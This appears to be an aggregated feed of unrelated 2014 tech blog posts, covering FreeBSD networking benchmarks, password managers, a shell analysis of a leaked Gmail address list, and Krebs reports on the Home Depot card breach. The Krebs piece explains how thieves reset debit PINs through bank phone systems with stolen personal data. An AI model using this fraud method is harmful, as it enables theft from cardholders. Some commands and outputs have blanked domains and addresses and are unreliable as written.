“Email address permutators, of which there are many of them on the ‘Net, have existed much longer than LinkedIn, and you can blast an email to all of them, knowing that most likely one of those will hit your target,” Scott said. “This is kind of one of those challenges that all social media companies face in trying to prevent the abuse of [site] functionality. We have rate limiting, scoring and abuse detection mechanisms to prevent frequent abusers of this service, and to make sure that people can’t validate spam lists.”

In an email sent to this reporter last week, LinkedIn said it was planning at least two changes to the way its service handles user email addresses.

“We are in the process of implementing two short-term changes and one longer term change to give our members more control over this feature,” Linkedin spokeswoman Nicole Leverich wrote in an emailed statement. “In the next few weeks, we are introducing new logic models designed to prevent hackers from abusing this feature. In addition, we are making it possible for members to ask us to opt out of being discoverable through this feature. In the longer term, we are looking into creating an opt-out box that members can choose to select to not be discoverable using this feature.”

The first BETA build for the FreeBSD 10.1 release cycle is now available. ISO images for the amd64, armv6, i386, ia64, powerpc, powerpc64 and sparc64 architectures are available on most of our FreeBSD mirror sites.

When I posted my previous post on accounts on Google+ I received a very interesting suggestions that I would like to bring to the attention of more people. Andrew Cooks pointed out that what LastPass (and other password managers) really need, is a way to specify the password policy programmatically, rather than crowdsourcing this data as LastPass is doing right now.

There are already a number of cross-product specifications of fixed-path files used to describe parameters such as robots.txt or sitemap.xml. While cleaning up my blog's image serving I also found that there is a rules.abe file used by the NoScript extension for Firefox. In this optic, adding a new password-policy.txt file to define some parameters for the password policy of the website.

Things like the minimum and maximum length of the password, which characters are allowed, whether it is case sensitive or not. These are important information that all the password managers need to know, and as I said not all websites make it clear to the user either. I'll recount two different horror stories, one in the past and one more recent, that show how that is important.

The first story is from probably almost ten years ago or so. I registered with the Italian postal service. I selected a "strong" (not really) password, 11 characters long. It was not really dictionary-based, but it was close enough if you knew my passwords' pattern. Anyway, I liked the idea of having the long password. I signed up for it, I logged back in, everything worked. Until a few months later, when I decided I wanted to fetch that particular mailbox from GMail — yes, the Italian postal service gives you an email box, no I don't want to comment further on that.

What happens is that the moment I tried to set up the mail fetching on GMail, it kept failing authentication. And I'm sure I used the right password that I've insisted using up to that point! I log in on the website just fine with it, so what gives? A quick check at the password that my browser (I think Firefox at the time) think is the password of that website shows me the truth: the password I've been using to log in does not match the one I tried to use from GMail: the last character is not there. Some further inspection of the postal service website shows that the password fields, both in the password change and login (and I assumed at the time the registration page for obvious reasons), set a maxlength value to 10. So of course, as long as I typed or pasted the password in the field, the way I typed it when I registered, it worked perfectly fine, but when I tried to login out of band (through POP3) it used the password as I intended, and failed.

A similar, more recent story happened with LastMinute. I went to change my password, in my recent spree of updating all my passwords, even for accounts not in use (mostly to make sure that they don't get leaked and allow people to do crazy stuff to me). My default password generator on LastPass is set to generate 32-characters passwords. But that did not work for LastMinute, or rather, it appeared to. It let me change my password just fine, but when I tried logging back in, well, it did not work. Yes, this is the reason that I try to log back in after generating the password, I've seen that happening before. In this case, the problem was to be found in the length of the password.

But just having a proper range for the password length wouldn't be enough. Other details that would be useful are for instance the allowed symbols; I have found that sometimes I need to either generate a number of passwords to find one that does not have one of the disallowed symbols but still has some, or give up on the symbols altogether and ask LastPass to generate only letters and numbers. Or having a way to tell that the password is case sensitive or not — because if it is not, what I do is disable the generation of one set of letters, so that it randomises them better.

But there is more metadata that could be of use there — things like which domains should the password be used with, for instance. Right now LastPass has a (limited) predefined list of equivalent domains, and hostnames that need to match exactly (so that and are given different passwords), while it's up to you to build the rest of the database. Even for the Amazon domains, the list is not comprehensive and I had to add quite a few when logging in the Italian and UK stores.

Of course if you were just to tell that your website uses the same password as, say,, you're going to have a problem. What you need is a reciprocal indication that both sites think the other is equivalent, basically serving the same identical file. This makes the implementation a bit more complex but it should not be too difficult as those kind of sites tend to at least share robots.txt (okay, not in the case of Amazon), so distributing one more file should not be that difficult.

I'm not sure if anybody is going to work on implementing this, or writing a proper specification for it, rather than a vague rant on a blog, but hope can't die, right?

I think it's about time I shared some more details about the RSS stuff going into FreeBSD and how I'm testing it.

For now I'm focusing on IPv4 + UDP on the Intel 10GE NICs. The TCP side of things is done (and the IPv6 side of things works too!) but enough of the performance walls show up in the IPv4 UDP case that it's worth sticking to it for now.

I'm testing on a pair of 4-core boxes at home. They're not special - and they're very specifically not trying to be server-class hardware. I'd like to see where these bottlenecks are even at low core count.

The test setup in question:

Testing software:

  • It requires libevent2 - an updated copy; previous versions of libevent2 didn't handle FreeBSD specific errors gracefully and would early error out of the IO loop.


  • CPU: Intel(R) Core(TM) i5-3550 CPU @ 3.30GHz (3292.59-MHz K8-class CPU)
  • There's no SMT/HTT, but I've disabled it in the BIOS just to be sure
  • 4GB RAM
  • FreeBSD-HEAD, amd64
  • NIC:  '82599EB 10-Gigabit SFI/SFP+ Network Connection
  • ix0:

# for now redirect processing just makes the lock overhead suck even more.
# disable it.


# experiment with deferred dispatch for RSS
kernel config:

include GENERIC

device netmap
options RSS
options PCBGROUP

# in-system lock profiling

# Flowtable - the rtentry locking is a bit .. slow.
options   FLOWTABLE

# This debugging code has too much overhead to do accurate
# testing with.
nooptions         INVARIANTS
nooptions         INVARIANT_SUPPORT
nooptions         WITNESS
nooptions         WITNESS_SKIPSPIN

The server runs the "rss-udp-srv" process, which behaves like a multi-threaded UDP echo server on port 8080.


The client box is slightly more powerful to compensate for (currently) not using completely affinity-aware RSS UDP transmit code.

  • CPU: Intel(R) Core(TM) i5-4460  CPU @ 3.20GHz (3192.68-MHz K8-class CPU)
  • SMT/HTT: Disabled in BIOS
  • 8GB RAM
  • FreeBSD-HEAD amd64
  • Same kernel config, loader and sysctl config as the server
  • ix0: configured as,,,,
The client runs 'udp-clt' programs to source and sink traffic to the server.

Running things

The server-side simply runs the listen server, configured to respond to each frame:

$ rss-udp-srv 1

The client-side runs four couples of udp-clt, each from different IP addresses. These are run in parallel (i do it in different screens, so I can quickly see what's going on):

$ ./udp-clt -l -r -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l -r -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l -r -p 8080 -n 10000000000 -s 510
$ ./udp-clt -l -r -p 8080 -n 10000000000 -s 510

The IP addresses are chosen so that the 2-tuple topelitz hash using the default Microsoft key hash to different RSS buckets that live on individual CPUs.

Results: Round one

When the server is responding to each frame, the following occurs. The numbers are "number of frames generated by the client (netstat)", "number of frames received by the server (netstat)", "number of frames seen by udp-rss-srv", "number of responses transmitted from udp-rss-srv", "number of frames seen by the server (netstat)"
  • 1 udp-clt process: 710,000; 710,000; 296,000; 283,000; 281,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 592,000; 592,000; 575,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 636,000; 636,000; 600,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 255,000; 255,000; 255,000
So, it's not actually linear past two cores. The question here is: why?

There are a couple of parts to this.

Firstly - I had left turbo boost on. What this translated to:

  • One core active: ~ 30% increase in clock speed
  • Two cores active: ~ 30% increase in clock speed
  • Three cores active: ~ 25% increase in clock speed
  • Four cores active: ~ 15% increase in clock speed.
Secondly and more importantly - I had left flow control enabled. This made a world of difference.

The revised results are mostly linear - with more active RSS buckets (and thus CPUs) things seem to get slightly more efficient:
  • 1 udp-clt process: 710,000; 710,000; 266,000; 266,000; 266,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 512,000; 512,000; 512,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 810,000; 810,000; 810,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 1,120,000; 1,120,000; 1,120,000

Finally, let's repeat the process but only receiving instead also echoing back the packet to the client:

$ rss-udp-srv 0
  • 1 udp-clt process: 710,000; 710,000; 204,000
  • 2 udp-clt processes: 1,300,000; 1,300,000; 378,000
  • 3 udp-clt processes: 1,800,000; 1,800,000; 645,000
  • 4 udp-clt processes: 2,100,000; 2,100,000; 900,000
The receive-only workload is actually worse off versus the transmit + receive workload!

What's going on here?

Well, a little digging shows that in both instances - even with a single udp-clt thread running which means only one CPU on the server side is actually active! - there's active lock contention.

Here's an example dtrace output for measuring lock contention with only one active process, where one CPU is involved (and the other three are idle):

Receive only, 5 seconds:

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # dtrace -n 'lockstat:::adaptive-block { @[stack()] = sum(arg1); }'
dtrace: description 'lockstat:::adaptive-block ' matched 1 probe


Transmit + receive, 5 seconds:

dtrace: description 'lockstat:::adaptive-block ' matched 1 probe




Somehow it seems there's less lock contention / blocking going on when both transmit and receive is running!

So then I dug into it using the lock profiling suite. This is for 5 seconds with receive-only traffic on a single RSS bucket / CPU (all other CPUs are idle):

# sysctl = 1; sleep 5 ; sysctl

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl ; sleep 5 ; sysctl 1 -> 1 1 -> 0

root@adrian-hackbox:/home/adrian/git/github/erikarn/freebsd-rss # sysctl | head -2 ; sysctl | sort -nk4 | tail -10 
     max  wait_max       total  wait_total       count    avg wait_avg cnt_hold cnt_lock name
    1496         0       10900           0          28    389      0  0      0 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2755 (sx:USB config SX lock) 
       0         0          31           1          67      0      0  0      4 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:888 (spin mutex:sched lock 2)
       0         0        2715           1       49740      0      0  0      7 /usr/home/adrian/work/freebsd/head/src/sys/dev/random/random_harvestq.c:294 (spin mutex:entropy harvest mutex)
       1         0          51           1         131      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:1179 (spin mutex:sched lock 1)
       0         0          69           2         170      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/sched_ule.c:886 (spin mutex:sched lock 2)
       0         0       40389           2      287649      0      0  0      8 /usr/home/adrian/work/freebsd/head/src/sys/kern/kern_intr.c:1359 (spin mutex:sched lock 2)
       0         2           2           4          12      0      0  0      2 /usr/home/adrian/work/freebsd/head/src/sys/dev/usb/usb_device.c:2762 (sleep mutex:Giant)
      15        20        6556         520        2254      2      0  0    105 /usr/home/adrian/work/freebsd/head/src/sys/dev/acpica/Osd/OsdSynch.c:535 (spin mutex:ACPI lock (0xfffff80002b10f00))

       4         5      195967       65888     3445501      0      0  0  28975 /usr/home/adrian/work/freebsd/head/src/sys/netinet/udp_usrreq.c:369 (sleep mutex:so_rcv)

Notice the lock contention for the so_rcv (socket receive buffer) handling? What's going on here is pretty amusing - it turns out that because there's so much receive traffic going on, the userland process receiving the data is being preempted by the NIC receive thread very often - and when this happens, there's a good chance it's going to be within the small window that the receive socket buffer lock is held. Once this happens, the NIC receive thread processes frames until it gets to one that requires it to grab the same sock buffer lock that is already held by userland - and it fails - so the NIC thread sleeps until the userland thread finishes consuming a packet. Then the CPU flips back to the NIC thread and continues processing a packet.

When the userland code is also transmitting frames it's increasing the amount of time in between socket receives and decreasing the probability of hitting the lock contention condition above.

Note there's no contention between CPUs here - this is entirely contention within a single CPU.

So for now I'm happy that the UDP IPv4 path is scaling well enough with RSS on a single core. The main performance problem here is the socket receive buffer locking (and, yes, copyin() / copyout().)


There has been some noise around a leak of users/passwords pairs which somehow panicked people into thinking it was coming from a particular provider. Since it seems most people have not even tried looking at the account information available, I'd like to point out some ways that could have helped avoiding the panic, if only the reporters cared. It also fits nicely into my previous notes on accounts' churn.

But before proceeding let me make one thing straight: this post contains no information that is not available to the public and bears no relation to my daily work for my employer. Just wanted to make that clear. Edit: for the official response, please see this blog post of Google's Security blog.

To begin the analysis you need a copy of the list of usernames; Italian blogger Paolo Attivissimo linked to it in his post but I'm not going to do so. Especially since it's likely to become obsolete soon, and might not be liked by many. The archive is a compressed list of usernames without passwords or password hashes. At first, it seems to contain almost exclusively addresses — in truth there are more addresses but it probably does not hit the news as much to say that there are some 5 million addresses from some thousand domains.

Let's first try to extract real email addresses from the file, which I'll call rawsource.txt — yes it does not match the name of the actual source file out there but I would rather avoid the search requests finding this post from the filename.

$ fgrep @ rawsource.txt > source-addresses.txt
This removes some two thousands lines that were not valid addresses — turns out that the file actually contains some passwords, so let's process it a little more to get a bigger sample of valid addresses:

$ sed -i -e 's:|.*::' source-addresses.txt
This should make the next command give us a better estimate of the content:

$ sed -n -e 's:.*@::p' source-addresses.txt | sort | uniq -c | sort -n
608 gmail.com777
So as we were saying earlier there are more than just Google accounts in this. A good chunk of them are on Yandex, but if you look at the outlier in the list there are plenty of other domains including Yahoo. Let's just filter away the four thousands addresses using either broken domains or outlier domains and instead focus on these three providers:

$ egrep '@(||$' source-addresses.txt > good-addresses.txt
Now things get more interesting, because to proceed to the next step you have to know how email servers and services work. For these three providers, and many default setups for postfix and similar, the local part of the address (everything before the @ sign) can contain a + sign, when that is found, the local part is split into user and extension, so that mail to nospam+noreally would be sent to the user nospam. Servers generally ignore the extension altogether, but you can use it to either register multiple accounts on the same mailbox (like I do for PayPal, IKEA, Sony, …) or to filter the received mail on different folders. I know some people who think they can absolutely identify the source of spam this way — I'm a bit more skeptical, if I was a spammer I would be dropping the extension altogether. Only some very die-hard Unix fans would not allow inbound email without an extension. Especially since I know plenty of services that don't accept email addresses with + in them.

Since this is not very well known, there are going to be very few email addresses using this feature, but that's still good because it limits the amount of data to crawl through. Finding a pattern within 5M addresses is going to take a while, finding one in 4k is much easier:

$ egrep '.*\+.*@.*' good-addresses.txt | sed -e '/.*@.*@.*/d' > experts-addresses.txt
The second command filters out some false positives due to two addresses being on the same line; the results from the source file I started with is 3964 addresses. Now we're talking. Let's extract the extensions from those good addresses:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort > extensions.txt
The first obvious thing you can do is figure out if there are duplicates. While the single extensions are probably interesting too, finding a pattern is easier if you have people using the same extension, especially since there aren't that many. So let's see which extensions are common:

$ sed -e 's:.*+\(.*\)@.*:\1:' experts-addresses.txt | sort | uniq -c -d | sort -n > common-extensions.txt
An obvious quick look look of that shows that a good chunk of the extensions (the last line in the generated file) used were referencing xtube – which you may or may not know as a porn website – reminding me of the YouPorn-related leak two and a half years ago. Scouring through the list of extensions, it's also easy to spot the words "porn" and "porno", and even "nudeceleb" making the list probably quite up to date.

Just looking at the list of extensions shows a few patterns. Things like friendster, comicbookdb (and variants like comics, comicdb, …) and then daz (dazstudio), and mythtv. As RT points out it might very well be phishing attempts, but it is also well possible that some of those smaller sites such as comicbookdb were breached and people just used the same passwords for their GMail address as the services (I used to, too!), which is why I think mandatory registrations are evil.

The final automatic interesting discovery you can make involves checking for full domains in the extensions themselves:

fgrep . extensions.txt | sort -u
This will give you which extensions include a dot in the name, many of which are actually proper site domains: xtube figures again, and so does comicbookdb, friendster, mythtvtalk, dax3d, s2games, policeauctions, itickets and many others.

What does this all tell me? I think what happens is that this list was compiled with breaches of different small websites that wouldn't make a headline (and that most likely did not report to their users!), plus some general phishing. Lots of the passwords that have been confirmed as valid most likely come from people not using different passwords across websites. This breach is fixed like every other before it: stop using the same password across different websites, start using something like LastPass, and use 2 Factor Authentication everywhere is possible.

Unifying PostgreSQL Ebuilds titanofold | 2014-09-10 14:01 UTC

After an excruciating wait and years of learning PostgreSQL, it’s time to unify the PostgreSQL ebuilds.I’m not sure what the original motivation was to split the ebuilds, but, from the history I’ve seen on Gentoo, it has always been that way. That’s a piss-poor reason for continuing to do things a certain way. Especially when that way is wrong and makes things more tedious and difficult than they ought to be.

I’m to blame for pressing forward with the splitting the ebuilds to -docs, -base, and -server when I first got started in Gentoo. I knew from the outset that having them split was not a good idea. I just didn’t know as much as I do now to defend one way or the other. To be fair, Patrick (bonsaikitten) would have gone with whatever I decided to do, but I thought I understood the advantages. Now I look at it and just see disadvantages.

Let’s first look at the build times for building the split ebuilds:

1961.35user 319.42system 33:59.44elapsed 111%CPU (0avgtext+0avgdata 682896maxresident)k
46696inputs+2000640outputs (34major+34350937minor)pagefaults 0swaps
1955.12user 325.01system 33:39.86elapsed 112%CPU (0avgtext+0avgdata 682896maxresident)k
7176inputs+1984960outputs (33major+34349678minor)pagefaults 0swaps
1942.90user 318.89system 33:53.70elapsed 111%CPU (0avgtext+0avgdata 682928maxresident)k
28496inputs+1999688outputs (124major+34343901minor)pagefaults 0swaps
And now the unified ebuild:

1823.57user 278.96system 30:29.20elapsed 114%CPU (0avgtext+0avgdata 683024maxresident)k
32520inputs+1455688outputs (100major+30199771minor)pagefaults 0swaps
1795.63user 282.55system 30:35.92elapsed 113%CPU (0avgtext+0avgdata 683024maxresident)k
9848inputs+1456056outputs (30major+30225195minor)pagefaults 0swaps
1802.47user 275.66system 30:08.30elapsed 114%CPU (0avgtext+0avgdata 683056maxresident)k
13800inputs+1454880outputs (49major+30193986minor)pagefaults 0swaps
So, the unified ebuild is about 10% faster than the split ebuilds.

There are also a few bugs open that will be resolved by moving to a unified ebuild. Whenever someone changes anything in their flags, Portage tends to only pick up dev-db/postgresql-server as needing to be recompiled rather than the appropriate dev-db/postgresql-base, which results in broken setups and failures to even build. I’ve even been accused of pulling the rug out from under people. I swear, it’s not me…it’s Portage…who I lied to. Kind of.

There should be little interruption, though, to the end user. I’ll be keeping all the features that splitting brought us. Okay, feature. There’s really just one feature: Proper slotting. Portage will be informed of the package moves, and everything should be hunky-dory with one caveat: A new ‘server’ USE flag is being introduced to control whether to build everything or just the clients and libraries.

No, I don’t want to do a lib-only flag. I don’t want to work on another hack.

You can check out the progress on my overlay. I’ll be working on the updating the dependent packages as well so they’re all ready to go in one shot.

Adobe today released updates to fix at least a dozen critical security problems in its Flash Player and AIR software. Separately, Microsoft pushed four update bundles to address at least 42 vulnerabilities in Windows, Internet Explorer, Lync and .NET Framework. If you use any of these, it’s time to update!

Most of the flaws Microsoft fixed today (37 of them) are addressed in an Internet Explorer update — the only patch this month to earn Microsoft’s most-dire “critical” label. A critical update wins that rating if the vulnerabilities fixed in the update could be exploited with little to no action on the part of users, save for perhaps visiting a hacked or malicious Web site with IE.

I’ve experienced troubles installing Patch Tuesday packages along with .NET updates, so I make every effort to update .NET separately. To avoid any complications, I would recommend that Windows users install all other available recommended patches except for the .NET bundle; after installing those updates, restart Windows and then install any pending .NET fixes). Your mileage may vary.

For more information on the rest of the updates released today, see this post at the Microsoft Security Response Center Blog.

Adobe’s critical update for Flash Player fixes at least 12 security holes in the program. Adobe is urging Windows and Macintosh users to update to Adobe Flash Player v. by visiting the Adobe Flash Player Download Center, or via the update mechanism within the product when prompted. If you’d rather not be bothered with downloaders and software “extras” like antivirus scanners, you’re probably best off getting the appropriate update for your operating system from this link.

To see which version of Flash you have installed, check this link. IE10/IE11 on Windows 8.x and Chrome should auto-update their versions of Flash.

Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (Firefox, Opera, e.g.). If you have Adobe AIR installed (required by some programs like Pandora Desktop), you’ll want to update this program. AIR ships with an auto-update function that should prompt users to update when they start an application that requires it; the newest, patched version is v. 15 for Windows, Mac, and Android.

Adobe had also been scheduled to release updates today for Adobe Reader and Acrobat, but the company said it was pushing that release date back to the week of Sept. 15 to address some issues that popped up during testing of the patches.

As always, if you experience any issues updating these products, please leave a note about your troubles in the comments below.

In one of my previous posts I have noted I'm an avid audiobook consumer. I started when I was at the hospital, because I didn't have the energy to read — and most likely, because of the blood sugar being out of control after coming back from the ICU: it turns out that blood sugar changes can make your eyesight go crazy; at some point I had to buy a pair of €20 glasses simply because my doctor prescribed me a new treatment and my eyesight ricocheted out of control for a week or so.

Nowadays, I have trouble sleeping if I'm not listening to something, and I end up with the Audible app installed in all my phones and tablets, with at least a few books preloaded whenever I travel. Of course as I said, I keep the majority of my audiobooks in the iPod, and the reason is that while most of my library is on Audible, not all of it is. There are a few books that I have bought on iTunes before finding out about Audible, and then there are a few I received in CD form, including The Hitchhiker's Guide To The Galaxy Complete Radio Series which is my among my favourite playlists.

Unfortunately, to be able to convert these from CD to a format that the iPod could digest, I ended up having to buy a software called Audiobook Builder for Mac, which allows you to rip CDs and build M4B files out of them. What's M4B? It's the usual mp4 format container, just with an extension that makes iTunes consider it an audiobook, and with chapter markings in the stream. At the time I first ripped my audiobooks, ffmpeg/libav had no support for chapter markings, so that was not an option. I've been told that said support is there now, but I have not tried getting it to work.

Indeed, what I need to find out is how to build an audiobook file out of a string of mp3 files, and I have no idea how to fix that now that I no longer have access to my personal iTunes account on a mac to re-download the Audiobook Builder and process them. In particular, the list of mp3s that I'm looking forward to merge together are the years 2013 and 2014 of BBC's The News Quiz, to which I'm addicted and listen continuously. Being able to join them all together so I can listen to them with a multi-day-running playlist is one of the very few things that still let me sleep relatively calmly — I say relatively because I really don't remember when was the last time I have slept soundly in about an year by now.

Essentially, what I'd like is for Audible to let me sideload some content (the few books I did not buy from them, and the News Quiz series that I stitch together from the podcast), and create a playlist — then for what I'm concerned I don't have to use an iPod at all. Well, beside the fact that I'd have to find a way to shut up notifications while playing audiobooks. Having Dragons of Autumn Twilight interrupted by the Facebook pop notification is not something that I'm looking forward for most of the time. And in some cases I even have had some background update disrupting my playback so there is definitely space for improvement.

PC-BSD at Fossetcon Official PC-BSD Blog | 2014-09-09 15:13 UTC

Fossetcon will take place September 11–13 at the Rosen Plaza Hotel in Orlando, FL. Registration for this event ranges from $10 to $85 and includes meals and a t-shirt.

There will be a BSD booth in the expo area on both Friday and Saturday from 10:30–18:30. As usual, we’ll be giving out a bunch of cool swag, PC-BSD DVDs, and FreeNAS CDs, as well as accepting donations for the FreeBSD Foundation.  Dru Lavigne will present “ZFS 101″ at 11:30 on Saturday. The BSDA certification exam will be held at 15:00 On Saturday.

Nearly a week after this blog first reported signs that Home Depot was battling a major security incident, the company has acknowledged that it suffered a credit and debit card breach involving its U.S. and Canadian stores dating back to April 2014. Home Depot was quick to assure customers and banks that no debit card PIN data was compromised in the break-in. Nevertheless, multiple financial institutions contacted by this publication are reporting a steep increase over the past few days in fraudulent ATM withdrawals on customer accounts.

The card data for sale in the underground that was stolen from Home Depot shoppers allows thieves to create counterfeit copies of debit and credit cards that can be used to purchase merchandise in big box stores. But if the crooks who buy stolen debit cards also are able to change the PIN on those accounts, the fabricated debit cards can then be used to withdraw cash from ATMs.

Experts say the thieves who are perpetrating the debit card fraud are capitalizing on a glut of card information stolen from Home Depot customers and being sold in cybercrime shops online. Those same crooks also are taking advantage of weak authentication methods in the automated phone systems that many banks use to allow customers to reset the PINs on their cards.

Here’s the critical part: The card data stolen from Home Depot customers and now for sale on the crime shop Rescator[dot]cc includes both the information needed to fabricate counterfeit cards as well as the legitimate cardholder’s full name and the city, state and ZIP of the Home Depot store from which the card was stolen (presumably by malware installed on some part of the retailer’s network, and probably on each point-of-sale device).

This is especially helpful for fraudsters since most Home Depot transactions are likely to occur in the same or nearby ZIP code as the cardholder. The ZIP code data of the store is important because it allows the bad guys to quickly and more accurately locate the Social Security number and date of birth of cardholders using criminal services in the underground that sell this information.

Why do the thieves need Social Security and date of birth information? Countless banks in the United States let customers change their PINs with a simple telephone call, using an automated call-in system known as a Voice Response Unit (VRU). A large number of these VRU systems allow the caller to change their PIN provided they pass three out of five security checks. One is that the system checks to see if the call is coming from a phone number on file for that customer. It also requests the following four pieces of information:

-the 3-digit code (known as a card verification value or CVV/CV2) printed on the back of the debit card;
-the card’s expiration date;
-the customer’s date of birth;
-the last four digits of the customer’s Social Security number.

On Thursday, I spoke with a fraud fighter at a bank in New England that experienced more than $25,000 in PIN debit fraud at ATMs in Canada. The bank employee said thieves were able to change the PINs on the cards using the bank’s automated VRU system. In this attack, the fraudsters were calling from disposable, prepaid Magic Jack telephone numbers, and they did not have the Cv2 for each card. But they were able to supply the other three data points.

KrebsOnSecurity also heard from an employee at a much larger bank on the West Coast that lost more than $300,000 in two hours today to PIN fraud on multiple debit cards that had all been used recently at Home Depot. The manager said the bad guys called the customer service folks at the bank and provided the last four of each cardholder’s Social Security number, date of birth, and the expiration date on the card. And, as with the bank in New England, that was enough information for the bank to reset the customer’s PIN.

The fraud manager said the scammers in this case also told the customer service people they were traveling in Italy, which made two things possible: It raised the withdrawal limits on the debit cards and allowed thieves to withdraw $300,000 in cash from Italian ATMs in the span of less than 120 minutes.

One way that banks can decrease the incidence of PIN reset fraud is to require that callers supply all of the requested information accurately, and indeed the bank employee I heard from in New England said a nearby financial institution she’d contacted that used the same VRU system saw its PIN fraud drop to zero when it began requiring that all questions be correctly answered. The bank on the West Coast that I interviewed also said it had already begun requiring all five elements before processing PIN changes on any cards that have been used at Home Depot since April.

Still, some of the world’s largest banks have begun moving away from so-called knowledge-based authentication for their VRU systems toward more robust technologies, such as voice biometrics and phone printing, said Avivah Litan, a fraud analyst with Gartner Inc.

“We saw this same activity in the wake of the breach at Target, where the thieves would call in and use the VRUs to check balances, remove blocks on cards, get the payment history and of course change PINs,” Litan said.

Voice biometric technologies create an index of voice fingerprints both for customers and various fraudsters who conduct VRU fraud, but Litan said fraudsters often will use voice synthesizers to defeat this layer of detection.

Phone printing profiles good and bad callers alike, building fingerprints based on dozens of call characteristics, including packet loss, dropped frames, noise, call clarity, phone type and a host of other far more geeky concepts (e.g., “quantization,” and “taggers“).


The fact that it is still possible to use customer service or an automated system to change someone else’s PIN with just the cardholder’s Social Security number, birthday and the expiration date of their stolen card is remarkable, and suggests that most banks remain clueless or willfully blind to the sophistication of identity theft services offered in the cybercrime underground. I know of at least two very popular and long-running cybercrime stores that sell this information for a few dollars apiece. One of them even advertises the sale of this information on more than 300 million Americans.

Banks are long overdue to move away from knowledge-based authentication. Forget about the fact that most major providers of these services have been shown to be compromised in the past year by the very crooks selling Social Security numbers and other data to identity thieves: The sad truth is that today’s cybercriminals are more likely to know the correct answers to these questions than you are.

I bring this up mainly because Home Depot is, predictably, offering credit monitoring services to affected customers (which, given the length of this breach is likely to impact a significant chunk of the American population). Credit and debit card fraud is annoying and inconvenient and can be at least temporarily expensive for victims, but as long as you are keeping a close eye on your monthly statements and reporting any unauthorized charges immediately, you will not be on the hook for those charges.

Please note that credit monitoring services will not help with this task, as they are not designed to look for fraud on existing accounts tied to your name and personal information. As I’ve noted in several stories, credit monitoring services are of dubious value because although they may alert you when thieves open new lines of credit in your name, those services do not prevent that activity. The one thing these services are good for is in helping identity theft victims clean up the mess and repair their good name.

However, given the fact that your Social Security number, date of birth and every possible answer to all of these knowledge-based authentication questions can be had for $25 in order to establish new lines of credit in your name, it makes good sense for people to avail themselves of free credit monitoring services. But there is little reason to pay for these services. If you don’t already have a credit monitoring service for free then maybe you haven’t been paying close enough attention to the dozens of companies over the past year that have likely lost your data in a breach and are already offering these services for free.

For more information about the benefits and limits of credit monitoring services — as well as other helpful tips to proactively safeguard your credit file — see this story.

More information, including an FAQ about the breach, released by Home Depot is available at this link.

The PC-BSD team is pleased to announce the availability of the next PC-BSD quarterly package update, version 10.0.3!

This update includes a number of important bug-fixes, as well as newer packages and desktops. Packages such as Chromium 37.0.2062.94, Cinnamon 2.2.14, Lumina 0.6.2 and more. This release also includes a CD-sized ISO of TrueOS, for users who want to install a server without X. For more details and updating instructions, refer to the notes below.

We are already hard at work on the next major release of PC-BSD, 10.1 later this fall, which will include FreeBSD 10.1-RELEASE under the hood. Users interested in following along with development should sign up for our Testing mailing list.

PC-BSD Notable Changes

* Cinnamon 2.2.14
* Chromium 37.0.2062.94
* NVIDIA Driver 340.24
* Lumina desktop 0.6.2-beta
* Pkg 1.3.7
* Various fixes to the Appcafe Qt UI
* Bugfixes to Warden / jail creation
* Fixed a bug with USB media not always being bootable
* Fixed several issues with Xorg setup
* Improved Boot-Environments to allow “beadm activate” to set default
* Support for jail “bulk” creation via Warden
* Fixes for relative ZFS dataset mount-point creation via Warden
* Support for full-disk (GELI) encryption without an unencrypted /boot partition


Along with our traditional PC-BSD DVD ISO image, we have also created a CD-sized ISO image of TrueOS, our server edition.

This is a text-based installer which includes FreeBSD 10.0-Release under the hood. It includes the following features:

* ZFS on Root installation
* Boot-Environment support
* Command-Line versions of PC-BSD utilities, such as Warden, Life-Preserver and more.
* Support for full-disk (GELI) encryption without an unencrypted /boot partition

We have some additional features also in the works for 10.1 and later, stay tuned this fall for more information.


Due to some changes with how pkgng works, it is recommended that all users update via the command-line using the following steps:

# pkg update –f
# pkg upgrade pkg
# pkg update –f
# pkg upgrade
# pc-extractoverlay ports
# reboot

PKGNG may need to re-install many of your packages to fix an issue with shared library version detection. If you run into issues doing this, or have conflicts, please open a bug report with the output of the above commands.

If you run into shared library issues running programs after upgrading, you may need to do a full-upgrade with the following:

# pkg upgrade –f

Getting media

10.0.3 DVD/USB media can be downloaded from this URL via HTTP or Torrent.

Reporting Bugs
Found a bug in 10.0.3? Please report it (with as much detail as possible) to our new RedMine Database.

The apparent credit and debit card breach uncovered last week at Home Depot was aided in part by a new variant of the malicious software program that stole card account data from cash registers at Target last December, according to sources close to the investigation.

Photo: Nicholas Eckhart
On Tuesday, KrebsOnSecurity broke the news that Home Depot was working with law enforcement to investigate “unusual activity” after multiple banks said they’d traced a pattern of card fraud back to debit and credit cards that had all been used at Home Depot locations since May of this year.

A source close to the investigation told this author that an analysis revealed at least some of Home Depot’s store registers had been infected with a new variant of “BlackPOS” (a.k.a. “Kaptoxa”), a malware strain designed to siphon data from cards when they are swiped at infected point-of-sale systems running Microsoft Windows.

The information on the malware adds another indicator that those responsible for the as-yet unconfirmed breach at Home Depot also were involved in the December 2013 attack on Target that exposed 40 million customer debit and credit card accounts. BlackPOS also was found on point-of-sale systems at Target last year. What’s more, cards apparently stolen from Home Depot shoppers first turned up for sale on Rescator[dot]cc, the same underground cybercrime shop that sold millions of cards stolen in the Target attack.

